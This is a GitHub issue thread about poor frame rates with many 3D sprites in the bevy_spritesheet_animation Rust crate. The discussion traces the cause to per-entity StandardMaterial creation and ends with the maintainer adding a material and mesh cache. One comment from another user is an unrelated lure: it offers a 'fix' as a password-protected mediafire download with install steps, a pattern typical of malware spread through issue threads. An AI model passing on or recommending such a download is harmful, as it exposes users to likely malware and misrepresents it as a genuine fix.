### ISSUE TITLE
3d: frame rate drops significantly with a lot of sprites possibly due to StandardMaterial not being reused

### ISSUE THREAD

**Issue by mgi388** [merwaaan/bevy_spritesheet_animation#12]
Every sprite entity gets a new material even:

https://github.com/merwaaan/bevy_spritesheet_animation/blob/4b2f7217b3ae64a6dc43ef25a9001f5bced152ae/src/systems/sprite3d.rs#L93

I think this causes the frame rate to drop. 

In a similar way to what is done in bevy_sprite3d, https://github.com/FraserLee/bevy_sprite3d/blob/ce57326ff63b1dae99cd2595422672bc82b22325/src/lib.rs#L297-L309, I think we need to use a material cache and return that handle if all of our props match.

It can be done in a separate issue, but if you do go down this path, it would be good to support `unlit` and `alpha_mode` from the outside, and so from the beginning make those part of the material key.

I haven't tried to change this locally to add a cache, so it's possible this isn't going to help, but even in other Bevy examples where I spawn identical 100 cubes and incorrectly create a new material for every cube I instantly see a frame rate drop. When I change to reuse the same material handle, the frame rate comes back up.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mgi388** [comment]
It could be worth adding a "3d stress" example to test this out. I've just hacked in a material cache into my fork and the material cache does help the frame rate, but not enough, it's still bad. I confirmed with inspector egui that before the material cache there were hundreds of StandardMaterial handles, and after there are only a handful, so I know the cache did kick. Not sure if having a mesh per entity is an issue (I would have guessed not).

For what it's worth, I am currently using `bevy_sprite3d` and there is no framerate drop at all using that billboard crate. Once I switch over to `bevy_spritesheet_animation`'s billboards it tanks.

Anyway, I'll let you know if I have any more results, but a "3d stress" example could be a good next step. It's probably a good time for me to get set up so I can profile this to provide more specific help with traces, etc.

**Comment by merwaaan** [comment]
Yes, I expected not caching materials to be less than ideal in terms of performance but waited to see if it was an actual issue. I guess now's the time to take a closer look.

> It could be worth adding a "3d stress" example to test this out.

I actually have one locally, I'll push it soon.

Anyway, I'm currently working on simplifying the high-level API of the library (first step before making it easier to control playback) and then I'll take a look into this issue. Don't hesitate to dig furthermore if you feel like it :)

**Comment by mgi388** [comment]
> Also, regarding materials, I'm wondering if something like bevy_sprite3d's material cache is actually a good idea: if the user mutates the material, say its color, then all the sprites that share the same cached material will update too, which might be unexpected.

Yeah in the hack that I did locally, I left a TODO note that this would happen. But I think it should possible to write it in such a way that it looks up the cache for the new material key / color and if it’s there or uses it, otherwise it creates a new material. I.e it never updates the color of an existing material. I suppose theoretically you could end up with endless materials if you’re changing the color endlessly. Not too sure.

**Comment by merwaaan** [comment]
@mgi388 The materials and meshes used by 3D sprites are now cached in the latest update, which speeds things up by a factor of about 3.

I chose to share cached materials for now. We might revisit this in the future if this is an issue for some users.
